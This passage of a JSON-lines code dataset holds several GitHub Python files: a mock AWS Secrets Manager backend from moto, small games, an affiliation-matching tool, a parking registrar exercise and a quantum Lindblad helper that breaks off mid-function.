ver_id\n break\n if not version_id:\n raise SecretNotFoundException()\n\n # TODO check this part\n if self.secrets[secret_id].is_deleted():\n raise InvalidRequestException(\n \"An error occurred (InvalidRequestException) when calling the GetSecretValue operation: You tried to \\\n perform the operation on a secret that's currently marked deleted.\"\n )\n\n secret = self.secrets[secret_id]\n version_id = version_id or secret.default_version_id\n\n secret_version = secret.versions.get(version_id)\n if not secret_version:\n raise ResourceNotFoundException(\n \"An error occurred (ResourceNotFoundException) when calling the GetSecretValue operation: Secrets \"\n \"Manager can't find the specified secret value for VersionId: {}\".format(\n version_id\n )\n )\n\n response_data = {\n \"ARN\": secret.arn,\n \"Name\": secret.name,\n \"VersionId\": secret_version[\"version_id\"],\n \"VersionStages\": secret_version[\"version_stages\"],\n \"CreatedDate\": secret_version[\"createdate\"],\n }\n\n if \"secret_string\" in secret_version:\n response_data[\"SecretString\"] = secret_version[\"secret_string\"]\n\n if \"secret_binary\" in secret_version:\n response_data[\"SecretBinary\"] = secret_version[\"secret_binary\"]\n\n if (\n \"secret_string\" not in secret_version\n and \"secret_binary\" not in secret_version\n ):\n raise SecretHasNoValueException(version_stage or \"AWSCURRENT\")\n\n response = json.dumps(response_data)\n\n return response\n\n def update_secret(\n self, secret_id, secret_string=None, secret_binary=None, **kwargs\n ):\n\n # error if secret does not exist\n if secret_id not in self.secrets.keys():\n raise SecretNotFoundException()\n\n if self.secrets[secret_id].is_deleted():\n raise InvalidRequestException(\n \"An error occurred (InvalidRequestException) when calling the UpdateSecret operation: \"\n \"You can't perform this operation on the secret because it was marked for deletion.\"\n )\n\n secret = self.secrets[secret_id]\n tags = secret.tags\n description = secret.description\n\n secret = self._add_secret(\n secret_id,\n secret_string=secret_string,\n secret_binary=secret_binary,\n description=description,\n tags=tags,\n )\n\n return secret.to_short_dict()\n\n def create_secret(\n self,\n name,\n 
secret_string=None,\n secret_binary=None,\n description=None,\n tags=[],\n **kwargs\n ):\n\n # error if secret exists\n if name in self.secrets.keys():\n raise ResourceExistsException(\n \"A resource with the ID you requested already exists.\"\n )\n\n secret = self._add_secret(\n name,\n secret_string=secret_string,\n secret_binary=secret_binary,\n description=description,\n tags=tags,\n )\n\n return secret.to_short_dict()\n\n def _add_secret(\n self,\n secret_id,\n secret_string=None,\n secret_binary=None,\n description=None,\n tags=[],\n version_id=None,\n version_stages=None,\n ):\n\n if version_stages is None:\n version_stages = [\"AWSCURRENT\"]\n\n if not version_id:\n version_id = str(uuid.uuid4())\n\n secret_version = {\n \"createdate\": int(time.time()),\n \"version_id\": version_id,\n \"version_stages\": version_stages,\n }\n if secret_string is not None:\n secret_version[\"secret_string\"] = secret_string\n\n if secret_binary is not None:\n secret_version[\"secret_binary\"] = secret_binary\n\n if secret_id in self.secrets:\n secret = self.secrets[secret_id]\n secret.update(description, tags)\n secret.reset_default_version(secret_version, version_id)\n else:\n secret = FakeSecret(\n region_name=self.region,\n secret_id=secret_id,\n secret_string=secret_string,\n secret_binary=secret_binary,\n description=description,\n tags=tags,\n )\n secret.set_versions({version_id: secret_version})\n secret.set_default_version_id(version_id)\n self.secrets[secret_id] = secret\n\n return secret\n\n def put_secret_value(self, secret_id, secret_string, secret_binary, version_stages):\n\n if not self._is_valid_identifier(secret_id):\n raise SecretNotFoundException()\n else:\n secret = self.secrets[secret_id]\n tags = secret.tags\n description = secret.description\n\n secret = self._add_secret(\n secret_id,\n secret_string,\n secret_binary,\n description=description,\n tags=tags,\n version_stages=version_stages,\n )\n\n return secret.to_short_dict(include_version_stages=True)\n\n def describe_secret(self, secret_id):\n if not self._is_valid_identifier(secret_id):\n raise SecretNotFoundException()\n\n secret = self.secrets[secret_id]\n\n return json.dumps(secret.to_dict())\n\n def rotate_secret(\n self,\n secret_id,\n client_request_token=None,\n rotation_lambda_arn=None,\n rotation_rules=None,\n ):\n\n rotation_days = \"AutomaticallyAfterDays\"\n\n if not self._is_valid_identifier(secret_id):\n raise SecretNotFoundException()\n\n if self.secrets[secret_id].is_deleted():\n raise InvalidRequestException(\n \"An error occurred (InvalidRequestException) when calling the RotateSecret operation: You tried to \\\n perform the operation on a secret that's currently marked deleted.\"\n )\n\n if client_request_token:\n token_length = len(client_request_token)\n if token_length < 32 or token_length > 64:\n msg = \"ClientRequestToken \" \"must be 32-64 characters long.\"\n raise InvalidParameterException(msg)\n\n if rotation_lambda_arn:\n if len(rotation_lambda_arn) > 2048:\n msg = \"RotationLambdaARN \" \"must <= 2048 characters long.\"\n raise InvalidParameterException(msg)\n\n if rotation_rules:\n if rotation_days in rotation_rules:\n rotation_period = rotation_rules[rotation_days]\n if rotation_period < 1 or rotation_period > 1000:\n msg = (\n \"RotationRules.AutomaticallyAfterDays \" \"must be within 1-1000.\"\n )\n raise InvalidParameterException(msg)\n\n secret = self.secrets[secret_id]\n\n old_secret_version = secret.versions[secret.default_version_id]\n new_version_id = client_request_token or 
str(uuid.uuid4())\n\n self._add_secret(\n secret_id,\n old_secret_version[\"secret_string\"],\n description=secret.description,\n tags=secret.tags,\n version_id=new_version_id,\n version_stages=[\"AWSCURRENT\"],\n )\n\n secret.rotation_lambda_arn = rotation_lambda_arn or \"\"\n if rotation_rules:\n secret.auto_rotate_after_days = rotation_rules.get(rotation_days, 0)\n if secret.auto_rotate_after_days > 0:\n secret.rotation_enabled = True\n\n if \"AWSCURRENT\" in old_secret_version[\"version_stages\"]:\n old_secret_version[\"version_stages\"].remove(\"AWSCURRENT\")\n\n return secret.to_short_dict()\n\n def get_random_password(\n self,\n password_length,\n exclude_characters,\n exclude_numbers,\n exclude_punctuation,\n exclude_uppercase,\n exclude_lowercase,\n include_space,\n require_each_included_type,\n ):\n # password size must have value less than or equal to 4096\n if password_length > 4096:\n raise ClientError(\n \"ClientError: An error occurred (ValidationException) \\\n when calling the GetRandomPassword operation: 1 validation error detected: Value '{}' at 'passwordLength' \\\n failed to satisfy constraint: Member must have value less than or equal to 4096\".format(\n password_length\n )\n )\n if password_length < 4:\n raise InvalidParameterException(\n \"InvalidParameterException: An error occurred (InvalidParameterException) \\\n when calling the GetRandomPassword operation: Password length is too short based on the required types.\"\n )\n\n response = json.dumps(\n {\n \"RandomPassword\": random_password(\n password_length,\n exclude_characters,\n exclude_numbers,\n exclude_punctuation,\n exclude_uppercase,\n exclude_lowercase,\n include_space,\n require_each_included_type,\n )\n }\n )\n\n return response\n\n def list_secret_version_ids(self, secret_id):\n secret = self.secrets[secret_id]\n\n version_list = []\n for version_id, version in secret.versions.items():\n version_list.append(\n {\n \"CreatedDate\": int(time.time()),\n \"LastAccessedDate\": int(time.time()),\n \"VersionId\": version_id,\n \"VersionStages\": version[\"version_stages\"],\n }\n )\n\n response = json.dumps(\n {\n \"ARN\": secret.secret_id,\n \"Name\": secret.name,\n \"NextToken\": \"\",\n \"Versions\": version_list,\n }\n )\n\n return response\n\n def list_secrets(self, filters, max_results, next_token):\n # TODO implement pagination and limits\n\n secret_list = []\n for secret in self.secrets.values():\n if _matches(secret, filters):\n secret_list.append(secret.to_dict())\n\n return secret_list, None\n\n def delete_secret(\n self, secret_id, recovery_window_in_days, force_delete_without_recovery\n ):\n\n if not self._is_valid_identifier(secret_id):\n raise SecretNotFoundException()\n\n if self.secrets[secret_id].is_deleted():\n raise InvalidRequestException(\n \"An error occurred (InvalidRequestException) when calling the DeleteSecret operation: You tried to \\\n perform the operation on a secret that's currently marked deleted.\"\n )\n\n if recovery_window_in_days and force_delete_without_recovery:\n raise InvalidParameterException(\n \"An error occurred (InvalidParameterException) when calling the DeleteSecret operation: You can't \\\n use ForceDeleteWithoutRecovery in conjunction with RecoveryWindowInDays.\"\n )\n\n if recovery_window_in_days and (\n recovery_window_in_days < 7 or recovery_window_in_days > 30\n ):\n raise InvalidParameterException(\n \"An error occurred (InvalidParameterException) when calling the DeleteSecret operation: The \\\n RecoveryWindowInDays value must be between 7 and 30 days 
(inclusive).\"\n )\n\n deletion_date = datetime.datetime.utcnow()\n\n if force_delete_without_recovery:\n secret = self.secrets.pop(secret_id, None)\n else:\n deletion_date += datetime.timedelta(days=recovery_window_in_days or 30)\n self.secrets[secret_id].delete(self._unix_time_secs(deletion_date))\n secret = self.secrets.get(secret_id, None)\n\n if not secret:\n raise SecretNotFoundException()\n\n arn = secret.arn\n name = secret.name\n\n return arn, name, self._unix_time_secs(deletion_date)\n\n def restore_secret(self, secret_id):\n\n if not self._is_valid_identifier(secret_id):\n raise SecretNotFoundException()\n\n secret = self.secrets[secret_id]\n secret.restore()\n\n return secret.arn, secret.name\n\n def tag_resource(self, secret_id, tags):\n\n if secret_id not in self.secrets.keys():\n raise SecretNotFoundException()\n\n secret = self.secrets[secret_id]\n old_tags = secret.tags\n\n for tag in tags:\n old_tags.append(tag)\n\n return secret_id\n\n @staticmethod\n def get_resource_policy(secret_id):\n resource_policy = {\n \"Version\": \"2012-10-17\",\n \"Statement\": {\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"AWS\": [\n \"arn:aws:iam::111122223333:root\",\n \"arn:aws:iam::444455556666:root\",\n ]\n },\n \"Action\": [\"secretsmanager:GetSecretValue\"],\n \"Resource\": \"*\",\n },\n }\n return json.dumps(\n {\n \"ARN\": secret_id,\n \"Name\": secret_id,\n \"ResourcePolicy\": json.dumps(resource_policy),\n }\n )\n\n\nsecretsmanager_backends = {}\nfor region in Session().get_available_regions(\"secretsmanager\"):\n secretsmanager_backends[region] = SecretsManagerBackend(region_name=region)\nfor region in Session().get_available_regions(\n \"secretsmanager\", partition_name=\"aws-us-gov\"\n):\n secretsmanager_backends[region] = SecretsManagerBackend(region_name=region)\nfor region in Session().get_available_regions(\n \"secretsmanager\", partition_name=\"aws-cn\"\n):\n secretsmanager_backends[region] = SecretsManagerBackend(region_name=region)\n","repo_name":"jweite/moto_bpandola","sub_path":"moto/secretsmanager/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":20087,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"36301204023","text":"#!/usr/bin/env python3\n# Steven Vandegrift 2022\n\nimport random\nimport os\n\nplaying = True\n\ndef find_winner(player, com):\n\tif player == com:\n\t\tprint(\"It's a tie!\")\n\telif player == 1 and com == 2: #Rock vs Paper\n\t\tprint(\"ROCK VS PAPER\")\n\t\tprint(\"Paper beats Rock, Computer Wins!\")\n\telif player == 1 and com == 3: #Rock vs Scissors:\n\t\tprint(\"ROCK VS SCISSORS\")\n\t\tprint(\"Rock beats Scissors, Player Wins!\")\n\telif player == 2 and com == 1: #Paper vs Rock\n\t\tprint(\"PAPER VS ROCK\")\n\t\tprint(\"Paper beats Rock, Player Wins!\")\n\telif player == 2 and com == 3: #Paper vs Scissors\n\t\tprint(\"PAPER VS SCISSORS\")\n\t\tprint(\"Scissors beats Paper, Computer Wins!\")\n\telif player == 3 and com == 1:\n\t\tprint(\"SCISSORS VS ROCK\")\n\t\tprint(\"Rock beats Scissors, Computer Wins!\")\n\telif player == 3 and com == 2:\n\t\tprint(\"PAPER VS SCISSORS\")\n\t\tprint(\"Scissors beats Paper, Player Wins!\")\n\nwhile playing: \n\tuser_choice = input(\"Pick 'Rock', 'Paper', or 'Scissors' \\n\")\n\tcomputer_choice = random.randint(1, 3)\n\tif user_choice.lower() == 'rock':\n\t\tuser_choice = 1\n\telif user_choice.lower() == 'paper':\n\t\tuser_choice = 2\n\telif user_choice.lower() == 'scissors':\n\t\tuser_choice = 3\n\telse:\n\t\tprint(\"That was 
not an option, try again\")\n\t\tos.system('clear')\n\tfind_winner(user_choice, computer_choice)\n\tkeep_playing = input(\"Want to play again? 'y' or 'n'\\n\")\n\tos.system('clear')\n\tif keep_playing == 'n':\n\t\tplaying = False\n\t\t\n\t","repo_name":"sjvandy/Rock_Paper_Scissors","sub_path":"Rock_Paper_Scissors.py","file_name":"Rock_Paper_Scissors.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14959276566","text":"#!/bin/python\n\nimport deck as d\nimport gui\nfrom tkinter import *\nfrom tkinter import ttk, messagebox\n\nimport sys\nfrom threading import Thread\nfrom time import sleep\n\ndef main(argv, nogui=False):\n if nogui:\n n = \"\"\n while type(n) != int:\n try:\n inp = int(input(\"How many players will play? \"))\n except ValueError:\n pass\n else:\n if 0 < inp <= 5:\n n = inp\n else:\n root, casinoTable, uname, bal, score, bet = gui.generateGUI()\n\n def dismiss():\n dlg.grab_release()\n dlg.destroy()\n\n n = [1]\n def retrieve(*arg):\n try:\n n[0] = int(n_player.get())\n except:\n pass\n else:\n if 0 < n[0] <= 5:\n dismiss()\n\n dlg = Toplevel(root)\n ttk.Label(dlg, text=\"Number of players:\").grid(column=0, row=0, padx=5, pady=5)\n n_player = StringVar()\n n_entry = ttk.Entry(dlg, textvariable=n_player)\n n_entry.grid(column=1, row=0, padx=5, pady=5)\n ttk.Button(dlg, text=\"Submit\", command=retrieve).grid(column=0, row=1, columnspan=2, padx=5, pady=5)\n dlg.protocol(\"WM_DELETE_WINDOW\", dismiss) # intercept close button\n dlg.transient(root) # dialog window is related to main\n dlg.wait_visibility() # can't grab until window appears, so we wait\n dlg.grab_set() # ensure all input goes to our window\n n_entry.focus()\n dlg.bind(\"\", retrieve)\n dlg.wait_window() # block until window is destroyed\n\n n = n[0]\n \n if nogui:\n if len(argv) > 1:\n players = p.initPlayers(n, int(argv[1]))\n else:\n players = p.initPlayers(n)\n else:\n if len(argv) > 1:\n players = p.initPlayers(n, root, int(argv[1]))\n else:\n players = p.initPlayers(n, root)\n deck = d.initStack(n)\n \n if nogui:\n playing = True\n while playing:\n gm.completeGame(players, deck)\n playing = input(\"replay? 
[y/N] \").lower() in [\"yes\", \"y\"]\n if playing and players == {}:\n print(\"No players have got money anymore, exiting.\")\n playing = False\n\n\n form = f\"┤ Recap for players that didn't go broke ├\"\n print(f\"{form:{'─'}^80s}\" + \"\\b╮\\r╭\")\n for name, player in players.items():\n form = f\"│{name} won {player['wins']} game{'' if player['wins'] == 1 else 's'} out of {len(player['score'])} with a final balance of ${player['balance']:.2f}\"\n print(f\"{form:{' '}<80s}\" + \"\\b│\")\n print(f\"{'':{'─'}^80s}\" + \"\\b╯\\r╰\")\n else:\n t = Thread(target=game, args=(players, deck, root, casinoTable, uname, bal, score, bet), daemon=True)\n t.start()\n root.mainloop()\n t.join(timeout=1)\n sys.exit()\n\n \ndef game(players, deck, root, casinoTable, uname, bal, score, bet):\n playing = True\n while playing:\n winners, blackJack = gm.completeGame(players, deck, {'root': root, 'table': casinoTable, 'uname': uname, 'bal':bal, 'score':score, 'bet':bet})\n if len(winners):\n form = f\"Game Over : {', '.join(winners)} won the game {'with a Black Jack ' if blackJack else ''}against the house\"\n else:\n form = f\"Game Over : All players lost to the house\"\n form += \"\\nReplay ?\"\n playing = messagebox.askyesno(title=\"Replay?\", message=form)\n if playing and players == {}:\n playing = False\n gui.recap(players, root)\n sleep(0.1)\n root.destroy()\n return\n\nif __name__ == \"__main__\":\n nogui = \"--no-gui\" in sys.argv\n argv = sys.argv\n if nogui:\n for i,a in enumerate(sys.argv):\n if a == \"--no-gui\":\n argv.pop(i)\n import game_management_nogui as gm\n import players_no_gui as p\n else:\n import game_management as gm\n import players as p\n\n main(argv, nogui)\n","repo_name":"TheyCallMeHacked/BlackJack-INF131","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4054,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"28366188313","text":"'''搜索最接近的匹配'''\ndef find_closest(look_for, target_data):\n#该函数完成一个简单的线性搜索,返回target_data中与look_for参数最接近的值\n def whats_the_difference(first, second): #嵌套函数\n if first == second:\n return(0)\n elif first > second:\n return(first - second)\n else:\n return(second - first)\n#这个嵌套函数给定两个值,这个函数会返回二者之差\n max_diff = 9999999\n for each_thing in target_data:\n diff = whats_the_difference(each_thing, look_for)\n if diff == 0:\n found_it = each_thing\n break\n elif diff < max_diff:\n max_diff = diff\n found_it = each_thing\n return(found_it)\n#这是运行数据会出现错误,见Demo5","repo_name":"kun375707/Pycharm","sub_path":"K/Demo4.py","file_name":"Demo4.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12903374296","text":"import pandas as pd\nimport re\nimport unicodedata\nimport Levenshtein\n\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nfrom helper_functions import *\n\ndef best_sim_score(l1, l2, l3, l4, simU, simG):\n \"\"\"\n Finds the best match between a 'key word' and several legal names from the ROR database (https://ror.org).\n ---> corrects special cases in the main map that follows\n\n Args:\n l1: List of light affiliations.\n l2: number of candidates.\n l3: List of pairs.\n l4: mult\n\n Returns:\n List: Resulting list containing organization names and their similarity scores.\n \"\"\"\n \n vectorizer = CountVectorizer()\n numUniv = sum([(l1[i].lower()).count('univ') for i in range(len(l1))])\n result = 
[]\n for i in range(len(l1)):\n best = [] \n s = l1[i]\n\n \n for j in range(len(l3)):\n x = l3[j][1] \n \n if [x, l3[j][2]] in result:\n continue\n \n if l4[l3[j][0]] == 1:\n \n if is_contained('univ', x.lower()) and l3[j][2]> simU:\n result.append([x, l3[j][2]])\n elif l3[j][2] >simG:\n result.append([x, l3[j][2]])\n\n \n \n elif l3[j][2] >=0.99:# and (is_contained(\"univ\", x.lower()) or is_contained(\"college\", x.lower()) or is_contained(\"center\", x.lower()) or is_contained(\"schule\", x.lower())): # If the similarity score of a pair (s,x) was 1, we store it to results list\n result.append([l3[j][1], 1])\n \n else:\n try:\n if not is_contained(\"univ\", x.lower()):\n continue # Skip if x does not contain \"university\" or \"univ\"\n \n if (is_contained('hosp', x.lower()) and not is_contained('hosp', s)) or (not is_contained('hosp', x.lower()) and is_contained('hosp', s)) or (is_contained('hopital', x.lower()) and not is_contained('hopital', s)) or (not is_contained('hopital', x.lower()) and is_contained('hopital', s)):\n continue\n s_vector = vectorizer.fit_transform([s]).toarray() #Else we compute the similarity of s with the original affiiation name\n x_vector = vectorizer.transform([x]).toarray()\n \n # Compute similarity between the vectors\n similarity = cosine_similarity(x_vector, s_vector)[0][0]\n if similarity> 0.1:\n similarity_l = 1 - Levenshtein.distance(x, l3[j][0]) / max(len(x), len(l3[j][0]))\n best.append([x, similarity,similarity_l])\n \n except:\n KeyError\n \n if best:\n max_numbers = defaultdict(float)\n for item in best:\n string, number1, number2 = item # Unpack the three elements\n max_numbers[string] = max(max_numbers[string], number1)\n\n reduced_best = [[string, number1, number2] for string, number1, number2 in best if number1 == max_numbers[string]]\n\n# Sort by number1 decreasingly and then by number2 in descending order\n reduced_best.sort(key=lambda x: (x[1], x[2]), reverse=True)\n \n result = result + reduced_best\n \n univ_list = []\n other_list = []\n \n for r in result:\n if is_contained('univ',r[0]):\n univ_list.append(r)\n else:\n other_list.append(r)\n \n limit = min(numUniv, l2)\n\n if len(univ_list)> limit:\n result = univ_list[:limit] + other_list\n \n result_dict = {}\n pairs_dict = {}\n \n \n for l in l3:\n pairs_dict[l[1]] = l[2]\n \n \n for p in result:\n result_dict[p[0]]= pairs_dict[p[0]]\n \n \n \n \n result_dict_list = [[y[0],result_dict[y[0]]] for y in result] \n \n \n return result_dict_list\n \n\ndef index_multiple_matchings(df):\n multiple_matchings = []\n mult = []\n\n for i in range(len(df)):\n result_dict = {}\n \n r_list = [y[3] for y in df.Pairs.iloc[i]]\n modified_list = [item for sublist in r_list for item in sublist]\n r = len(list(set(modified_list)))\n \n for t in [t[0] for t in df.Pairs.iloc[i]]:\n key = t\n if key in result_dict and r>1:\n result_dict[key] += 1\n multiple_matchings.append(i)\n \n else:\n result_dict[key] = 1\n mult.append(result_dict)\n \n return [list(set(multiple_matchings)), mult]\n\n\n\ndef Aff_Ids(m, DF, dix_org, dix_mult, dix_city, dix_country, simU, simG):\n \n \"\"\"\n Matches affiliations in DataFrame 'DF' with names from dictionary 'dix_org' and their ROR_ids based on similarity scores.\n\n Args:\n m (int): The number of DOIs to check.\n DF (DataFrame): The input DataFrame containing affiliation data.\n dix_org (dict): A dictionary of names of organizations and their ROR_ids.\n dix_mult, dix_city, dix_country (dict): Dictionaries that help distinguish between different organizations that have 
the same name.\n simU (float): Similarity threshold for universities.\n simG (float): Similarity threshold for non-universities.\n\n Returns:\n DataFrame: The final DataFrame with matched affiliations and their corresponding similarity scores.\n \"\"\"\n vectorizer = CountVectorizer()\n\n lnamelist = list(dix_org.keys())\n dix = {} # will store indeces and legalnames of organizations of the DOI { i : [legalname1, legalname2,...]}\n deiktes = [] # stores indeces where a match is found\n similarity_ab = [] # stores lists of similarity scores of the mathces \n pairs = [] # pairs[i] = [ [s,x,t,r] ] where (s,x) is a match, t the corresponding similarity score and r thr ROR_id\n \n for k in range(m):\n similar_k = []\n pairs_k = []\n\n\n for s in DF['Keywords'].iloc[k]:\n\n if s in lnamelist:\n deiktes.append(k)\n similarity = 1\n similar_k.append(similarity)\n \n pairs_k.append((s,s,similarity,dix_org[s]))\n\n if k not in dix:\n dix[k] = [s]\n else:\n dix[k].append(s)\n else:\n\n for x in lnamelist:\n \n if is_contained(s, x):\n\n x_vector = vectorizer.fit_transform([x]).toarray()\n s_vector = vectorizer.transform([s]).toarray()\n\n # Compute similarity between the vectors\n similarity = cosine_similarity(x_vector, s_vector)[0][0]\n if similarity > min(simU, simG):\n if (is_contained('univ', s) and is_contained('univ', x)) and similarity > simU:\n similar_k.append(similarity)\n deiktes.append(k)\n pairs_k.append((s,x,similarity,dix_org[x]))\n\n if k not in dix:\n dix[k] = [x]\n else:\n dix[k].append(x)\n elif (not is_contained('univ', s) and not is_contained('univ', x)) and similarity > simG:\n similar_k.append(similarity)\n deiktes.append(k)\n pairs_k.append((s,x,similarity,dix_org[x]))\n\n if k not in dix:\n dix[k] = [x]\n else:\n dix[k].append(x)\n \n elif is_contained(x, s):\n if (is_contained('univ', s) and is_contained('univ', x)):\n\n if ' and ' in s:\n list_s = s.split(' and ')\n \n if list_s:\n for q in list_s:\n if is_contained('univ', q):\n\n q_vector = vectorizer.fit_transform([q]).toarray()\n x_vector = vectorizer.transform([x]).toarray()\n\n # Compute similarity between the vectors\n similarity = cosine_similarity(q_vector, x_vector)[0][0]\n if similarity > simU:\n similar_k.append(similarity)\n deiktes.append(k)\n pairs_k.append((s,x,similarity,dix_org[x]))\n\n if k not in dix:\n dix[k] = [x]\n else:\n dix[k].append(x)\n \n else: \n\n s_vector = vectorizer.fit_transform([s]).toarray()\n x_vector = vectorizer.transform([x]).toarray()\n\n # Compute similarity between the vectors\n similarity = cosine_similarity(s_vector, x_vector)[0][0]\n if similarity > simU: #max(0.82,sim):\n similar_k.append(similarity)\n deiktes.append(k)\n pairs_k.append((s,x,similarity,dix_org[x]))\n\n if k not in dix:\n dix[k] = [x]\n else:\n dix[k].append(x)\n elif not is_contained('univ', s) and not is_contained('univ', x):\n\n s_vector = vectorizer.fit_transform([s]).toarray()\n x_vector = vectorizer.transform([x]).toarray()\n\n # Compute similarity between the vectors\n similarity = cosine_similarity(s_vector, x_vector)[0][0]\n if similarity > simG: #max(0.82,sim):\n similar_k.append(similarity)\n deiktes.append(k)\n pairs_k.append((s,x,similarity,dix_org[x]))\n\n if k not in dix:\n dix[k] = [x]\n else:\n dix[k].append(x)\n \n similarity_ab.append(similar_k) \n similarity_ab = [lst for lst in similarity_ab if lst != []]\n pairs.append(pairs_k)\n \n \n \n \n## Define the new Dataframe\n \n aff_id_df = pd.DataFrame()\n aff_id_df['Original affiliations'] = list(DF['Original 
affiliations'].iloc[list(set(deiktes))])\n\n aff_id_df['Light affiliations'] = list(DF['Light affiliations'].iloc[list(set(deiktes))])\n\n aff_id_df['Candidates for matching'] = list(DF['Keywords'].iloc[list(set(deiktes))])\n\n\n aff_id_df['Matched organizations'] = list(dix.values())\n aff_id_df['# Matched organizations'] = [len(list(dix.values())[i]) for i in range(len(list(dix.values())))]\n \n\n aff_id_df['Similarity score'] = similarity_ab\n\n Pairs = [lst for lst in pairs if lst]\n aff_id_df['Pairs'] = Pairs\n aff_id_df['mult'] = index_multiple_matchings(aff_id_df)[1]\n\n\n\n\n## Correct the matchings\n need_check = list(set([i for i in range(len(aff_id_df)) for k in list(aff_id_df['mult'].iloc[i].values()) if k>1]))\n \n\n ready = [i for i in range(len(aff_id_df)) if i not in need_check]\n \n \n best = [ best_sim_score([aff_id_df['Light affiliations'].iloc[i]], len(aff_id_df['Candidates for matching'].iloc[i]), aff_id_df['Pairs'].iloc[i],aff_id_df['mult'].iloc[i], simU, simG) for i in need_check]\n best_o = []\n best_s = []\n \n for x in best:\n best_o.append([x[i][0] for i in range(len(x))])\n best_s.append([round(x[i][1],2) for i in range(len(x))])\n num_mathced = [len(best_s[i]) for i in range(len(need_check))]\n \n\n \n df_final0 = (aff_id_df.iloc[ready]).copy()\n df_final0['index'] = ready\n \n df_final1 = (aff_id_df.iloc[need_check]).copy()\n df_final1['index'] = need_check\n df_final1['Matched organizations'] = best_o\n df_final1['Similarity score'] = best_s\n df_final1['# Matched organizations'] = num_mathced\n \n final_df = pd.concat([df_final0, df_final1])\n final_df.set_index('index', inplace=True)\n final_df.sort_values('index', ascending=True, inplace = True)\n \n #ids = [[dix_org[x] if dix_mult[x] == 'unique' else 'many' for x in v ] for v in final_df['Matched organizations']]\n ids = []\n for i,v in enumerate(list(final_df['Matched organizations'])):\n id_list = []\n for x in v:\n if dix_mult[x] == 'unique':\n id_list.append(dix_org[x])\n else:\n if x in list(dix_city.keys()):\n match_found = False\n\n for city in dix_city[x]:\n if city[0] in (final_df['Original affiliations'].iloc[i]).lower():\n id_list.append(city[1])\n match_found = True\n break \n if not match_found:\n match_found2 = False\n for country in dix_country[x]:\n if country[0] in (final_df['Original affiliations'].iloc[i]).lower():\n id_list.append(country[1])\n match_found2 = True\n break \n \n if not match_found2:\n id_list.append(dix_org[x])\n else:\n id_list.append(dix_org[x])\n ids.append(id_list)\n\n \n \n \n \n new_ror = []\n for v in ids: \n v1 =list(set(v))\n new_ror.append(v1)\n\n new_ror\n \n\n numIds = [len(x) for x in new_ror]\n\n\n final_df['ROR'] = ids \n final_df['# unique RORs'] = numIds\n final_df['unique ROR'] = new_ror\n\n final_df = final_df[~(final_df['# Matched organizations'] == 0)]\n \n final_df = final_df.reset_index(drop=True)\n \n return final_df\n \n","repo_name":"mkallipo/matching","sub_path":"main_functions.py","file_name":"main_functions.py","file_ext":"py","file_size_in_byte":14886,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"10387540944","text":"n = int(input())\r\nregistrar = {}\r\nfor act in range(n):\r\n command = input().split()\r\n if command[0] == \"register\":\r\n if command[1] in registrar and registrar[command[1]] != command[2]:\r\n print(f\"ERROR: already registered with plate number {registrar[command[1]]}\")\r\n else:\r\n registrar[command[1]] = command[2]\r\n print(f\"{command[1]} registered 
{registrar[command[1]]} successfully\")\r\n elif command[0] == \"unregister\":\r\n if command[1] not in registrar:\r\n print(f\"ERROR: user {command[1]} not found\")\r\n else:\r\n registrar.pop(command[1])\r\n print(f\"{command[1]} unregistered successfully\")\r\n\r\nfor key, value in registrar.items():\r\n print(f\"{key} => {value}\")","repo_name":"mironmiron3/SoftuniPythonFundamentals","sub_path":"SoftUniParking.py","file_name":"SoftUniParking.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"13331326222","text":"import numpy as np\n\ndef colstack(rho):\n return rho.reshape((rho.shape[0]**2,1),order=\"F\") # column stacked\n\ndef uncolstack(rho):\n dim = int(np.sqrt(rho.shape[0]))\n return rho.reshape((dim,dim),order=\"F\") \n\n# calJ is the dictionary lists of (x,y) pairs for each omega\n# pi is a function so that pi(x) is the projector onto the x'th energy space\n# couplers is a list of coupling operators. These must be hermitian,\n# and the sum of their spectral norms squared must be 1. The function\n# checks neither of these.\ndef get_lindblad(calJ, pi, couplers, beta):\n dim = pi(0).shape[0]\n \n def G(omega):\n return min(1, np.exp(-omega*beta))\n \n def S(omega, coupler):\n S_omega = np.zeros((dim,dim)).astype(complex)\n for (x,y) in calJ[omega]:\n S_omega += pi(x) @ coupler @ pi(y)\n return S_omega\n \n out = np.zeros((dim**2,dim**2)).astype(complex)\n\n for coupler in couplers:\n for omega in calJ.keys():\n L = np.sqrt(G(omega)) * S(omega, coupler)\n out += np.kron(L, L.conj())\n LL = L.conj().T @ L\n out -= 0.5 * np.kron(LL, np.eye(dim))\n out -= 0.5 * np.kron(np.eye(dim), LL.T)\n\n return out\n\ndef get_spectral_gap(L):\n L_eigvals = np.real(np.linalg.eigvals(L))\n\n error = None\n \n if len(list(filter(lambda x: np.allclose(x,0),L_eigvals))) != 1:\n error = \"Non-degenerate nullspace.\"\n\n unique_eigvals = np.unique(L_eigvals)\n gap = -np.max(list(filter(lambda x: not np.allclose(x,0), unique_eigvals)))\n\n return gap, error\n\n\ndef check_steady_state(L, rho):\n rho_vec = colstack(rho)\n return np.allclose( np.zeros(rho_vec.shape), L @ rho_vec)\n\n\ndef get_steady_state(L):\n error = None\n\n # only extract one vector in the null space\n #steady_vec = np.linalg.lstsq(L, np.zeros(L.shape[0]),rcond=None)[0]\n L_eigvals, L_eigvecs = np.linalg.eig(L)\n\n if len(list(filter(lambda x: np.allclose(x,0),L_eigvals))) != 1:\n error = \"Non-degenerate nullspace.\"\n\n steady = uncolstack(L_eigvecs[:,0])\n \n if np.allclose(np.trace(steady),0):\n return steady, \"Steady state is traceless.\"\n\n steady /= np.trace(steady)\n\n if error is not None and not 